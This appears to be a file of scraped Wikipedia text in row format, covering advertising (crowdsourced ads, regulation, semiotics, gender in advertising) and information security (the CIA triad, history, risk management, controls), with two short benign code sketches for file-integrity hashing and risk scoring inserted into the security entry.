people, as opposed to an advertising agency or the company themselves, often resulting from brand sponsored advertising competitions. For the 2007 Super Bowl, the Frito-Lays division of PepsiCo held the "Crash the Super Bowl" contest, allowing people to create their own Doritos commercials. 101 Chevrolet held a similar competition for their Tahoe line of SUVs. 101 Due to the success of the Doritos user-generated ads in the 2007 Super Bowl, Frito-Lays relaunched the competition for the 2009 and 2010 Super Bowl. The resulting ads were among the most-watched and most-liked Super Bowl ads. In fact, the winning ad that aired in the 2009 Super Bowl was ranked by the USA Today Super Bowl Ad Meter as the top ad for the year while the winning ads that aired in the 2010 Super Bowl were found by Nielsen's BuzzMetrics to be the "most buzzed-about". 
102 103 Another example of companies using crowdsourcing successfully is the beverage company Jones Soda that encourages consumers to participate in the label design themselves. 104 This trend has given rise to several online platforms that host user-generated advertising competitions on behalf of a company. Founded in 2007, Zooppa has launched ad competitions for brands such as Google, Nike, Hershey's, General Mills, Microsoft, NBC Universal, Zinio, and Mini Cooper. 105 Crowdsourcing remains controversial, as the long-term impact on the advertising industry is still unclear. 106 Advertising has gone through five major stages of development: domestic, export, international, multi-national, and global. For global advertisers, there are four, potentially competing, business objectives that must be balanced when developing worldwide advertising: building a brand while speaking with one voice, developing economies of scale in the creative process, maximizing local effectiveness of ads, and increasing the company's speed of implementation. Born from the evolutionary stages of global marketing are the three primary and fundamentally different approaches to the development of global advertising executions: exporting executions, producing local executions, and importing ideas that travel. 107 Advertising research is key to determining the success of an ad in any country or region. The ability to identify which elements and or moments of an ad contribute to its success is how economies of scale are maximized. Once one knows what works in an ad, that idea or ideas can be imported by any other market. Market research measures, such as Flow of Attention, Flow of Emotion and branding moments provide insight into what is working in an ad in any country or region because the measures are based on the visual, not verbal, elements of the ad. 108 Foreign governments, which? particularly those that own marketable commercial products or services, often promote their interests and positions through the advertising of those goods because the target audience is not only largely unaware of the forum as a vehicle for foreign messaging but also willing to receive the message while in a mental state of absorbing information from advertisements during television commercial breaks, while reading a periodical, or while passing by billboards in public spaces. A prime example of this messaging technique is advertising campaigns to promote international travel. While advertising foreign destinations and services may stem from the typical goal of increasing revenue by drawing more tourism, some travel campaigns carry the additional or alternative intended purpose of promoting good sentiments or improving existing ones among the target audience towards a given nation or region. It is common for advertising promoting foreign countries to be produced and distributed by the tourism ministries of those countries, so these ads often carry political statements and or depictions of the foreign government's desired international public perception. Additionally, a wide range of foreign airlines and travel-related services which advertise separately from the destinations, themselves, are owned by their respective governments; examples include, though are not limited to, the Emirates airline (Dubai), Singapore Airlines (Singapore), Qatar Airways (Qatar), China Airlines (Taiwan Republic of China), and Air China (People's Republic of China). 
By depicting their destinations, airlines, and other services in a favorable and pleasant light, countries market themselves to populations abroad in a manner that could mitigate prior public impressions. In the realm of advertising agencies, continued industry diversification has seen observers note that "big global clients don't need big global agencies any more". 109 This is reflected by the growth of non-traditional agencies in various global markets, such as Canadian business TAXI and SMART in Australia and has been referred to as "a revolution in the ad world". 110 The ability to record shows on digital video recorders (such as TiVo) allow watchers to record the programs for later viewing, enabling them to fast forward through commercials. Additionally, as more seasons of pre-recorded box sets are offered for sale of television programs; fewer people watch the shows on TV. However, the fact that these sets are sold, means the company will receive additional profits from these sets. To counter this effect, a variety of strategies have been employed. Many advertisers have opted for product placement on TV shows like Survivor. Other strategies include integrating advertising with internet-connected program guidess (EPGs), advertising on companion devices (like smartphones and tablets) during the show, and creating mobile apps for TV programs. Additionally, some like brands have opted for social television sponsorship. 111 The emerging technology of drone displays has recently been used for advertising purposes. 112 In recent years there have been several media literacy initiatives, and more specifically concerning advertising, that seek to empower citizens in the face of media advertising campaigns. 113 Advertising education has become popular with bachelor, master and doctorate degrees becoming available in the emphasis. citation needed A surge in advertising interest is typically attributed to the strong relationship advertising plays in cultural and technological changes, such as the advance of online social networking. citation needed A unique model for teaching advertising is the student-run advertising agency, where advertising students create campaigns for real companies. 114 Organizations such as the American Advertising Federation establish companies with students to create these campaigns. citation needed Advertising is at the front of delivering the proper message to customers and prospective customers. The purpose of advertising is to inform the consumers about their product and convince customers that a company's services or products are the best, enhance the image of the company, point out and create a need for products or services, demonstrate new uses for established products, announce new products and programs, reinforce the salespeople's individual messages, draw customers to the business, and to hold existing customers. 115 Sales promotions are another way to advertise. Sales promotions are double purposed because they are used to gather information about what type of customers one draws in and where they are, and to jump start sales. Sales promotions include things like contests and games, sweepstakes, product giveaways, samples coupons, loyalty programs, and discounts. The ultimate goal of sales promotions is to stimulate potential customers to action. 116 While advertising can be seen as necessary for economic growth, 36 it is not without social costs. 
Unsolicited commercial e-mail and other forms of spam have become so prevalent as to have become a major nuisance to users of these services, as well as being a financial burden on internet service providers. 117 Advertising is increasingly invading public spaces, such as schools, which some critics argue is a form of child exploitation. 118 This increasing difficulty in limiting exposure to specific audiences can result in negative backlash for advertisers. 119 In tandem with these criticisms, the advertising industry has seen low approval rates in surveys and negative cultural portrayals. 120 A 2021 study found that for more than 80% of brands, advertising had a negative return on investment. 121 Unsolicited ads have been criticized as attention theft. 122 One of the most controversial criticisms of advertisement in the present day is that of the predominance of advertising of foods high in sugar, fat, and salt specifically to children. Critics claim that food advertisements targeting children are exploitive and are not sufficiently balanced with proper nutritional education to help children understand the consequences of their food choices. Additionally, children may not understand that they are being sold something, and are therefore more impressionable. 123 Michelle Obama has criticized large food companies for advertising unhealthy foods largely towards children and has requested that food companies either limit their advertising to children or advertise foods that are more in line with dietary guidelines. 124 The other criticisms include the change that are brought by those advertisements on the society and also the deceiving ads that are aired and published by the corporations. Cosmetic and health industry are the ones which exploited the highest and created reasons of concern. 125 Political advertisement and their regulations have been scrutinized for misinformation, ethics and political bias. 126 There have been increasing efforts to protect the public interest by regulating the content and the influence of advertising. Some examples include restrictions for advertising alcohol, tobacco or gambling imposed in many countries, as well as the bans around advertising to children, which exist in parts of Europe. Advertising regulation focuses heavily on the veracity of the claims and as such, there are often tighter restrictions placed around advertisements for food and healthcare products. 127 The advertising industries within some countries rely less on laws and more on systems of self-regulation. 127 128 129 Advertisers and the media agree on a code of advertising standards that they attempt to uphold. The general aim of such codes is to ensure that any advertising is 'legal, decent, honest and truthful'. Some self-regulatory organizations are funded by the industry, but remain independent, with the intent of upholding the standards or codes like the Advertising Standards Authority in the UK. 130 In the UK, most forms of outdoor advertising such as the display of billboards is regulated by the UK Town and County Planning system. Currently, the display of an advertisement without consent from the Planning Authority is a criminal offense liable to a fine of 2,500 per offense. 131 In the US, many communities believe that many forms of outdoor advertising blight the public realm. 132 As long ago as the 1960s in the US, there were attempts to ban billboard advertising in the open countryside. 
133 Cities such as S o Paulo have introduced an outright ban 134 with London also having specific legislation to control unlawful displays. Some governments restrict the languages that can be used in advertisements, but advertisers may employ tricks to try avoiding them. In France for instance, advertisers sometimes print English words in bold and French translations in fine print to deal with Article 120 of the 1994 Toubon Law limiting the use of English. 135 The advertising of pricing information is another topic of concern for governments. In the United States for instance, it is common for businesses to only mention the existence and amount of applicable taxes at a later stage of a transaction. 136 In Canada and New Zealand, taxes can be listed as separate items, as long as they are quoted up-front. 137 138 In most other countries, the advertised price must include all applicable taxes, enabling customers to easily know how much it will cost them. 139 140 141 Various competing models of hierarchies of effects attempt to provide a theoretical underpinning to advertising practice. clarification needed 142 The marketing mix was proposed by professor E. Jerome McCarthy in the 1960s. 146 It consists of four basic elements called the "four Ps". Product is the first P representing the actual product. Price represents the process of determining the value of a product. Place represents the variables of getting the product to the consumer such as distribution channels, market coverage and movement organization. The last P stands for Promotion which is the process of reaching the target market and convincing them to buy the product. In the 1990s, the concept of four Cs was introduced as a more customer-driven replacement of four P's. 147 There are two theories based on four Cs: Lauterborn's four Cs (consumer, cost, communication, convenience) 148 and Shimizu's four Cs (commodity, cost, communication, channel) in the 7Cs Compass Model (Co-marketing). Communications can include advertising, sales promotion, public relations, publicity, personal selling, corporate identity, internal communication, SNS, and MIS. 149 150 151 152 Advertising research is a specialized form of research that works to improve the effectiveness and efficiency of advertising. It entails numerous forms of research which employ different methodologies. Advertising research includes pre-testing (also known as copy testing) and post-testing of ads and or campaigns. Pre-testing includes a wide range of qualitative and quantitative techniques, including: focus groups, in-depth target audience interviews (one-on-one interviews), small-scale quantitative studies and physiological measurement. The goal of these investigations is to better understand how different groups respond to various messages and visual prompts, thereby providing an assessment of how well the advertisement meets its communications goals. 153 Post-testing employs many of the same techniques as pre-testing, usually with a focus on understanding the change in awareness or attitude attributable to the advertisement. 154 With the emergence of digital advertising technologies, many firms have begun to continuously post-test ads using real-time data. This may take the form of A B split-testing or multivariate testing. Continuous ad tracking and the Communicus System are competing examples of post-testing advertising research types. 155 Meanings between consumers and marketers depict signs and symbols that are encoded in everyday objects. 
156 Semiotics is the study of signs and how they are interpreted. Advertising has many hidden signs and meanings within brand names, logos, package designs, print advertisements, and television advertisements. Semiotics aims to study and interpret the message being conveyed in (for example) advertisements. Logos and advertisements can be interpreted at two levels known as the surface level and the underlying level. The surface level uses signs creatively to create an image or personality for a product. citation needed These signs can be images, words, fonts, colors, or slogans. The underlying level is made up of hidden meanings. The combination of images, words, colors, and slogans must be interpreted by the audience or consumer. 157 The "key to advertising analysis" is the signifier and the signified. The signifier is the object and the signified is the mental concept. 158 A product has a signifier and a signified. The signifier is the color, brand name, logo design, and technology. The signified has two meanings known as denotative and connotative. The denotative meaning is the meaning of the product. A television's denotative meaning might be that it is high definition. The connotative meaning is the product's deep and hidden meaning. A connotative meaning of a television would be that it is top-of-the-line. 159 Apple's commercials when? used a black silhouette of a person that was the age of Apple's target market. They placed the silhouette in front of a blue screen so that the picture behind the silhouette could be constantly changing. However, the one thing that stays the same in these ads is that there is music in the background and the silhouette is listening to that music on a white iPod through white headphones. Through advertising, the white color on a set of earphones now signifies that the music device is an iPod. The white color signifies almost all of Apple's products. 160 The semiotics of gender plays a key influence on the way in which signs are interpreted. When considering gender roles in advertising, individuals are influenced by three categories. Certain characteristics of stimuli may enhance or decrease the elaboration of the message (if the product is perceived as feminine or masculine). Second, the characteristics of individuals can affect attention and elaboration of the message (traditional or non-traditional gender role orientation). Lastly, situational factors may be important to influence the elaboration of the message. citation needed There are two types of marketing communication claims-objective and subjective. 161 Objective claims stem from the extent to which the claim associates the brand with a tangible product or service feature. For instance, a camera may have auto-focus features. Subjective claims convey emotional, subjective, impressions of intangible aspects of a product or service. They are non-physical features of a product or service that cannot be directly perceived, as they have no physical reality. For instance the brochure has a beautiful design. 162 Males tend to respond better to objective marketing-communications claims while females tend to respond better to subjective marketing communications claims. 163 Voiceovers are commonly used in advertising. Most voiceovers are done by men, with figures of up to 94% having been reported. 164 There have been more female voiceovers in recent years, when? but mainly for food, household products, and feminine-care products. 
165 According to a 1977 study by David Statt, females process information comprehensively, while males process information through heuristic devices such as procedures, methods or strategies for solving problems, which could have an effect on how they interpret advertising. 166 need quotation to verify According to this study, men prefer to have available and apparent cues to interpret the message, whereas females engage in more creative, associative, imagery-laced interpretation. Later research by a Danish team 167 found that advertising attempts to persuade men to improve their appearance or performance, whereas its approach to women aims at transformation toward an impossible ideal of female presentation. In Paul Suggett's article "The Objectification of Women in Advertising" he discusses the negative impact that these women in advertisements, who are too perfect to be real, have on women, as well as men, in real life. 168 Advertising's manipulation of women's aspiration to these ideal types as portrayed in film, in erotic art, in advertising, on stage, within music videos and through other media exposures requires at least a conditioned rejection of female reality and thereby takes on a highly ideological cast. Studies show that these expectations of women and young girls negatively affect their views about their bodies and appearances. These advertisements are directed towards men. Not everyone agrees: one critic viewed this monologic, gender-specific interpretation of advertising as excessively skewed and politicized. 169 need quotation to verify There are some companies like Dove and aerie that are creating commercials to portray more natural women, with less post production manipulation, so more women and young girls are able to relate to them. citation needed More recent research by Martin (2003) reveals that males and females differ in how they react to advertising depending on their mood at the time of exposure to the ads and on the affective tone of the advertising. When feeling sad, males prefer happy ads to boost their mood. In contrast, females prefer happy ads when they are feeling happy. The television programs in which ads are embedded influence a viewer's mood state. 170 Susan Wojcicki, author of the article "Ads that Empower Women don't just Break Stereotypes—They're also Effective" discusses how advertising to women has changed since the first Barbie commercial, where a little girl tells the doll that, she wants to be just like her. Little girls grow up watching advertisements of scantily clad women advertising things from trucks to burgers and Wojcicki states that this shows girls that they are either arm candy or eye candy. 171 Other approaches to revenue include donations, paid subscriptions, microtransactions, and data monetization. Websites and applications are "ad-free" when not using advertisements at all for revenue. For example, the online encyclopedia Wikipedia provides free 172 content by receiving funding from charitable donations. 173 Notes |
321 | https://en.wikipedia.org/wiki/Web_scraping | https://uk.wikipedia.org/wiki/Web_scraping | (Ukrainian-language Wikipedia article on web scraping. The character filter stripped all non-Latin text, so the body is not recoverable; the surviving Latin fragments indicate that the article covered the definition of web scraping, the 2023 Twitter/X Corp. rate limits and scraping lawsuit, a 2020 CNIL decision on scraping, the 2015 Ryanair v. PR Aviation ruling, and Database Directive 96/9 of 11 March 1996.) |
322 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Portal:Current_events | Armed conflicts and attacks Law and crime Politics and elections Armed conflicts and attacks Disasters and accidents Health and environment Law and crime Politics and elections Armed conflicts and attacks Business and economy Disasters and accidents Health and environment International relations Law and crime Politics and elections Armed conflicts and attacks Disasters and accidents Health and environment Law and crime Politics and elections Armed conflicts and attacks Disasters and accidents Law and crime Politics and elections Science and technology Armed conflicts and attacks Arts and culture Business and economy Disasters and accidents Law and crime Politics and elections Science and technology Armed conflicts and attacks Disasters and accidents International relations Politics and elections Sports |
323 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Information_security | Information security, sometimes shortened to infosec, 1 is the practice of protecting information by mitigating information risks. It is part of information risk management. 2 3 It typically involves preventing or reducing the probability of unauthorized or inappropriate access to data or the unlawful use, disclosure, disruption, deletion, corruption, modification, inspection, recording, or devaluation of information. 4 It also involves actions intended to reduce the adverse impacts of such incidents. Protected information may take any form, e.g., electronic or physical, tangible (e.g., paperwork), or intangible (e.g., knowledge). 5 6 Information security's primary focus is the balanced protection of data confidentiality, integrity, and availability (also known as the "CIA" triad) while maintaining a focus on efficient policy implementation, all without hampering organization productivity. 7 This is largely achieved through a structured risk management process that involves: To standardize this discipline, academics and professionals collaborate to offer guidance, policies, and industry standards on passwords, antivirus software, firewalls, encryption software, legal liability, security awareness and training, and so forth. 9 This standardization may be further driven by a wide variety of laws and regulations that affect how data is accessed, processed, stored, transferred, and destroyed. 10 However, the implementation of any standards and guidance within an entity may have limited effect if a culture of continual improvement is not adopted. 11 Various definitions of information security are suggested below, summarized from different sources: At the core of information security is information assurance, the act of maintaining the confidentiality, integrity, and availability (CIA) of information, ensuring that information is not compromised in any way when critical issues arise. 24 These issues include but are not limited to natural disasters, computer server malfunction, and physical theft. While paper-based business operations are still prevalent, requiring their own set of information security practices, enterprise digital initiatives are increasingly being emphasized, 25 26 with information assurance now typically being dealt with by information technology (IT) security specialists. These specialists apply information security to technology (most often some form of computer system). It is worthwhile to note that a computer does not necessarily mean a home desktop. 27 A computer is any device with a processor and some memory. Such devices can range from non-networked standalone devices as simple as calculators, to networked mobile computing devices such as smartphones and tablet computers. 28 IT security specialists are almost always found in any major enterprise establishment due to the nature and value of the data within larger businesses. 29 They are responsible for keeping all of the technology within the company secure from malicious cyber attacks that often attempt to acquire critical private information or gain control of the internal systems. 30 31 The field of information security has grown and evolved significantly in recent years. 
32 It offers many areas for specialization, including securing networks and allied infrastructure, securing applications and databases, security testing, information systems auditing, business continuity planning, electronic record discovery, and digital forensics. 33 Information security professionals are very stable in their employment. 34 As of 2013 update more than 80 percent of professionals had no change in employer or employment over a period of a year, and the number of professionals is projected to continuously grow more than 11 percent annually from 2014 to 2019. 35 Information security threats come in many different forms. 36 37 Some of the most common threats today are software attacks, theft of intellectual property, theft of identity, theft of equipment or information, sabotage, and information extortion. 38 39 Viruses, 40 worms, phishing attacks, and Trojan horses are a few common examples of software attacks. The theft of intellectual property has also been an extensive issue for many businesses in the information technology (IT) field. 41 Identity theft is the attempt to act as someone else usually to obtain that person's personal information or to take advantage of their access to vital information through social engineering. 42 43 Theft of equipment or information is becoming more prevalent today due to the fact that most devices today are mobile, 44 are prone to theft and have also become far more desirable as the amount of data capacity increases. Sabotage usually consists of the destruction of an organization's website in an attempt to cause loss of confidence on the part of its customers. 45 Information extortion consists of theft of a company's property or information as an attempt to receive a payment in exchange for returning the information or property back to its owner, as with ransomware. 46 There are many ways to help protect yourself from some of these attacks but one of the most functional precautions is conduct periodical user awareness. 47 The number one threat to any organisation are users or internal employees, they are also called insider threats. 48 Governments, military, corporations, financial institutions, hospitals, non-profit organisations, and private businesses amass a great deal of confidential information about their employees, customers, products, research, and financial status. 49 Should confidential information about a business's customers or finances or new product line fall into the hands of a competitor or a black hat hacker, a business and its customers could suffer widespread, irreparable financial loss, as well as damage to the company's reputation. 50 From a business perspective, information security must be balanced against cost; the Gordon-Loeb Model provides a mathematical economic approach for addressing this concern. 51 For the individual, information security has a significant effect on privacy, which is viewed very differently in various cultures. 52 Possible responses to a security threat or risk are: 53 Since the early days of communication, diplomats and military commanders understood that it was necessary to provide some mechanism to protect the confidentiality of correspondence and to have some means of detecting tampering. 55 Julius Caesar is credited with the invention of the Caesar cipher c. 50 B.C., which was created in order to prevent his secret messages from being read should a message fall into the wrong hands. 
56 However, for the most part protection was achieved through the application of procedural handling controls. 57 58 Sensitive information was marked up to indicate that it should be protected and transported by trusted persons, guarded and stored in a secure environment or strong box. 59 As postal services expanded, governments created official organizations to intercept, decipher, read, and reseal letters (e.g., the U.K.'s Secret Office, founded in 1653 60 ). In the mid-nineteenth century more complex classification systems were developed to allow governments to manage their information according to the degree of sensitivity. 61 For example, the British Government codified this, to some extent, with the publication of the Official Secrets Act in 1889. 62 Section 1 of the law concerned espionage and unlawful disclosures of information, while Section 2 dealt with breaches of official trust. 63 A public interest defense was soon added to defend disclosures in the interest of the state. 64 A similar law was passed in India in 1889, The Indian Official Secrets Act, which was associated with the British colonial era and used to crack down on newspapers that opposed the Raj's policies. 65 A newer version was passed in 1923 that extended to all matters of confidential or secret information for governance. 66 By the time of the First World War, multi-tier classification systems were used to communicate information to and from various fronts, which encouraged greater use of code making and breaking sections in diplomatic and military headquarters. 67 Encoding became more sophisticated between the wars as machines were employed to scramble and unscramble information. 68 The establishment of computer security inaugurated the history of information security. The need for such appeared during World War II. 69 The volume of information shared by the Allied countries during the Second World War necessitated formal alignment of classification systems and procedural controls. 70 An arcane range of markings evolved to indicate who could handle documents (usually officers rather than enlisted troops) and where they should be stored as increasingly complex safes and storage facilities were developed. 71 The Enigma Machine, which was employed by the Germans to encrypt the data of warfare and was successfully decrypted by Alan Turing, can be regarded as a striking example of creating and using secured information. 72 Procedures evolved to ensure documents were destroyed properly, and it was the failure to follow these procedures which led to some of the greatest intelligence coups of the war (e.g., the capture of U 570 72 ). Various mainframe computers were connected online during the Cold War to complete more sophisticated tasks, in a communication process easier than mailing magnetic tapes back and forth by computer centers. As such, the Advanced Research Projects Agency (ARPA), of the United States Department of Defense, started researching the feasibility of a networked system of communication to trade information within the United States Armed Forces. In 1968, the ARPANET project was formulated by Larry Roberts, which would later evolve into what is known as the internet. 
73 In 1973, important elements of ARPANET security were found by internet pioneer Robert Metcalfe to have many flaws such as the: "vulnerability of password structure and formats; lack of safety procedures for dial-up connections; and nonexistent user identification and authorizations", aside from the lack of controls and safeguards to keep data safe from unauthorized access. Hackers had effortless access to ARPANET, as phone numbers were known by the public. 74 Due to these problems, coupled with the constant violation of computer security, as well as the exponential increase in the number of hosts and users of the system, "network security" was often alluded to as "network insecurity". 74 The end of the twentieth century and the early years of the twenty-first century saw rapid advancements in telecommunications, computing hardware and software, and data encryption. 75 The availability of smaller, more powerful, and less expensive computing equipment made electronic data processing within the reach of small business and home users. 76 The establishment of Transfer Control Protocol Internetwork Protocol (TCP IP) in the early 1980s enabled different types of computers to communicate. 77 These computers quickly became interconnected through the internet. 78 The rapid growth and widespread use of electronic data processing and electronic business conducted through the internet, along with numerous occurrences of international terrorism, fueled the need for better methods of protecting the computers and the information they store, process, and transmit. 79 The academic disciplines of computer security and information assurance emerged along with numerous professional organizations, all sharing the common goals of ensuring the security and reliability of information systems. 80 The "CIA" triad of confidentiality, integrity, and availability is at the heart of information security. 81 (The members of the classic InfoSec triad—confidentiality, integrity, and availability—are interchangeably referred to in the literature as security attributes, properties, security goals, fundamental aspects, information criteria, critical information characteristics and basic building blocks.) 82 However, debate continues about whether or not this triad is sufficient to address rapidly changing technology and business requirements, with recommendations to consider expanding on the intersections between availability and confidentiality, as well as the relationship between security and privacy. 24 Other principles such as "accountability" have sometimes been proposed; it has been pointed out that issues such as non-repudiation do not fit well within the three core concepts. 83 The triad seems to have first been mentioned in a NIST publication in 1977. 84 In 1992 and revised in 2002, the OECD's Guidelines for the Security of Information Systems and Networks 85 proposed the nine generally accepted principles: awareness, responsibility, response, ethics, democracy, risk assessment, security design and implementation, security management, and reassessment. 86 Building upon those, in 2004 the NIST's Engineering Principles for Information Technology Security 83 proposed 33 principles. From each of these derived guidelines and practices. In 1998, Donn Parker proposed an alternative model for the classic "CIA" triad that he called the six atomic elements of information. The elements are confidentiality, possession, integrity, authenticity, availability, and utility. 
The merits of the Parkerian Hexad are a subject of debate amongst security professionals. 87 In 2011, The Open Group published the information security management standard O-ISM3. 88 This standard proposed an operational definition of the key concepts of security, with elements called "security objectives", related to access control (9), availability (3), data quality (1), compliance, and technical (4). In 2009, the DoD Software Protection Initiative released the Three Tenets of Cybersecurity, which are System Susceptibility, Access to the Flaw, and Capability to Exploit the Flaw. 89 90 91 Neither of these models is widely adopted. In information security, confidentiality "is the property that information is not made available or disclosed to unauthorized individuals, entities, or processes". 92 While similar to "privacy", the two words are not interchangeable. Rather, confidentiality is a component of privacy that serves to protect our data from unauthorized viewers. 93 Examples of compromised confidentiality of electronic data include laptop theft, password theft, or sensitive emails being sent to the wrong individuals. 94 In IT security, data integrity means maintaining and assuring the accuracy and completeness of data over its entire lifecycle. 95 This means that data cannot be modified in an unauthorized or undetected manner. 96 This is not the same thing as referential integrity in databases, although it can be viewed as a special case of consistency as understood in the classic ACID model of transaction processing. 97 Information security systems typically incorporate controls to ensure their own integrity, in particular protecting the kernel or core functions against both deliberate and accidental threats. 98 Multi-purpose and multi-user computer systems aim to compartmentalize the data and processing such that no user or process can adversely impact another; the controls may not succeed, however, as we see in incidents such as malware infections, hacks, data theft, fraud, and privacy breaches. 99 More broadly, integrity is an information security principle that involves human/social, process, and commercial integrity, as well as data integrity. As such it touches on aspects such as credibility, consistency, truthfulness, completeness, accuracy, timeliness, and assurance. 100 For any information system to serve its purpose, the information must be available when it is needed. 101 This means the computing systems used to store and process the information, the security controls used to protect it, and the communication channels used to access it must be functioning correctly. 102 High availability systems aim to remain available at all times, preventing service disruptions due to power outages, hardware failures, and system upgrades. 103 Ensuring availability also involves preventing denial-of-service attacks, such as a flood of incoming messages to the target system, essentially forcing it to shut down. 104 In the realm of information security, availability can often be viewed as one of the most important parts of a successful information security program. Ultimately, end-users need to be able to perform job functions; by ensuring availability, an organization is able to perform to the standards that its stakeholders expect. 
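The integrity and availability properties described above map onto two very small checks. The sketch below is illustrative only and not drawn from the scraped article: the file name and health-check URL are hypothetical placeholders, and the requests call mirrors the library already imported at the top of this notebook.

import hashlib
import requests

# Integrity: detect unauthorized or undetected modification by comparing a
# SHA-256 digest of the current file contents against a previously recorded one.
def sha256_of_file(path):
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(8192), b""):
            digest.update(chunk)
    return digest.hexdigest()

KNOWN_GOOD_DIGEST = "0" * 64  # placeholder: record the real digest at baseline time
if sha256_of_file("records.csv") != KNOWN_GOOD_DIGEST:  # hypothetical file name
    print("Integrity check failed: the file has been modified.")

# Availability: a simple probe that the service answers within a timeout.
try:
    response = requests.get("https://example.org/health", timeout=5)  # hypothetical URL
    print("Service available:", response.status_code == 200)
except requests.RequestException as error:
    print(f"Service unavailable: {error}")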
105 This can involve topics such as proxy configurations, outside web access, the ability to access shared drives and the ability to send emails. 106 Executives oftentimes do not understand the technical side of information security and look at availability as an easy fix, but this often requires collaboration from many different organizational teams, such as network operations, development operations, incident response, and policy change management. 107 A successful information security team involves many different key roles to mesh and align for the "CIA" triad to be provided effectively. 108 In law, non-repudiation implies one's intention to fulfill their obligations to a contract. It also implies that one party of a transaction cannot deny having received a transaction, nor can the other party deny having sent a transaction. 109 It is important to note that while technology such as cryptographic systems can assist in non-repudiation efforts, the concept is at its core a legal concept transcending the realm of technology. 110 It is not, for instance, sufficient to show that the message matches a digital signature signed with the sender's private key, and thus only the sender could have sent the message, and nobody else could have altered it in transit (data integrity). 111 The alleged sender could in return demonstrate that the digital signature algorithm is vulnerable or flawed, or allege or prove that his signing key has been compromised. 112 The fault for these violations may or may not lie with the sender, and such assertions may or may not relieve the sender of liability, but the assertion would invalidate the claim that the signature necessarily proves authenticity and integrity. As such, the sender may repudiate the message (because authenticity and integrity are pre-requisites for non-repudiation). 113 Broadly speaking, risk is the likelihood that something bad will happen that causes harm to an informational asset (or the loss of the asset). 114 A vulnerability is a weakness that could be used to endanger or cause harm to an informational asset. A threat is anything (man-made or act of nature) that has the potential to cause harm. 115 The likelihood that a threat will use a vulnerability to cause harm creates a risk. When a threat does use a vulnerability to inflict harm, it has an impact. 116 In the context of information security, the impact is a loss of availability, integrity, and confidentiality, and possibly other losses (lost income, loss of life, loss of real property). 117 The Certified Information Systems Auditor (CISA) Review Manual 2006 defines risk management as "the process of identifying vulnerabilities and threats to the information resources used by an organization in achieving business objectives, and deciding what countermeasures, 118 if any, to take in reducing risk to an acceptable level, based on the value of the information resource to the organization. 119 There are two things in this definition that may need some clarification. First, the process of risk management is an ongoing, iterative process. It must be repeated indefinitely. The business environment is constantly changing and new threats and vulnerabilities emerge every day. 120 Second, the choice of countermeasures (controls) used to manage risks must strike a balance between productivity, cost, effectiveness of the countermeasure, and the value of the informational asset being protected. 
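To make the likelihood-and-impact framing above concrete, here is a small qualitative risk-scoring sketch. It is not taken from the scraped article or from any named standard; the rating scales, acceptance threshold, and example entries are assumptions chosen purely for illustration.

# Qualitative risk scoring: risk score = likelihood x impact, each rated 1-5.
# The assets, ratings, and the acceptance threshold below are invented.
risks = [
    {"asset": "customer database", "threat": "SQL injection", "likelihood": 4, "impact": 5},
    {"asset": "internal wiki", "threat": "stale accounts", "likelihood": 3, "impact": 2},
]

ACCEPTANCE_THRESHOLD = 9  # scores at or below this are accepted; above it, mitigate or transfer

for risk in risks:
    score = risk["likelihood"] * risk["impact"]
    decision = "accept" if score <= ACCEPTANCE_THRESHOLD else "mitigate or transfer"
    print(f'{risk["asset"]:<20} {risk["threat"]:<15} score={score:>2} -> {decision}')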
121 Furthermore, these processes have limitations as security breaches are generally rare and emerge in a specific context which may not be easily duplicated. 122 Thus, any process and countermeasure should itself be evaluated for vulnerabilities. 123 It is not possible to identify all risks, nor is it possible to eliminate all risk. The remaining risk is called "residual risk". 124 A risk assessment is carried out by a team of people who have knowledge of specific areas of the business. 125 Membership of the team may vary over time as different parts of the business are assessed. 126 The assessment may use a subjective qualitative analysis based on informed opinion, or where reliable dollar figures and historical information is available, the analysis may use quantitative analysis. Research has shown that the most vulnerable point in most information systems is the human user, operator, designer, or other human. 127 The ISO IEC 27002:2005 Code of practice for information security management recommends the following be examined during a risk assessment: In broad terms, the risk management process consists of: 128 129 For any given risk, management can choose to accept the risk based upon the relative low value of the asset, the relative low frequency of occurrence, and the relative low impact on the business. 136 Or, leadership may choose to mitigate the risk by selecting and implementing appropriate control measures to reduce the risk. In some cases, the risk can be transferred to another business by buying insurance or outsourcing to another business. 137 The reality of some risks may be disputed. In such cases leadership may choose to deny the risk. 138 Selecting and implementing proper security controls will initially help an organization bring down risk to acceptable levels. 139 Control selection should follow and should be based on the risk assessment. 140 Controls can vary in nature, but fundamentally they are ways of protecting the confidentiality, integrity or availability of information. ISO IEC 27001 has defined controls in different areas. 141 Organizations can implement additional controls according to requirement of the organization. 142 ISO IEC 27002 offers a guideline for organizational information security standards. 143 Administrative controls (also called procedural controls) consist of approved written policies, procedures, standards, and guidelines. Administrative controls form the framework for running the business and managing people. 144 They inform people on how the business is to be run and how day-to-day operations are to be conducted. Laws and regulations created by government bodies are also a type of administrative control because they inform the business. 145 Some industry sectors have policies, procedures, standards, and guidelines that must be followed the Payment Card Industry Data Security Standard 146 (PCI DSS) required by Visa and MasterCard is such an example. Other examples of administrative controls include the corporate security policy, password policy, hiring policies, and disciplinary policies. 147 Administrative controls form the basis for the selection and implementation of logical and physical controls. Logical and physical controls are manifestations of administrative controls, which are of paramount importance. 144 Logical controls (also called technical controls) use software and data to monitor and control access to information and computing systems. 
citation needed Passwords, network and host-based firewalls, network intrusion detection systems, access control lists, and data encryption are examples of logical controls. 148 An important logical control that is frequently overlooked is the principle of least privilege, which requires that an individual, program or system process not be granted any more access privileges than are necessary to perform the task. 149 A blatant example of the failure to adhere to the principle of least privilege is logging into Windows as user Administrator to read email and surf the web. Violations of this principle can also occur when an individual collects additional access privileges over time. 150 This happens when employees' job duties change, employees are promoted to a new position, or employees are transferred to another department. 151 The access privileges required by their new duties are frequently added onto their already existing access privileges, which may no longer be necessary or appropriate. 152 Physical controls monitor and control the environment of the work place and computing facilities. 153 They also monitor and control access to and from such facilities and include doors, locks, heating and air conditioning, smoke and fire alarms, fire suppression systems, cameras, barricades, fencing, security guards, cable locks, etc. Separating the network and workplace into functional areas are also physical controls. 154 An important physical control that is frequently overlooked is separation of duties, which ensures that an individual can not complete a critical task by himself. 155 For example, an employee who submits a request for reimbursement should not also be able to authorize payment or print the check. 156 An applications programmer should not also be the server administrator or the database administrator; these roles and responsibilities must be separated from one another. 157 Information security must protect information throughout its lifespan, from the initial creation of the information on through to the final disposal of the 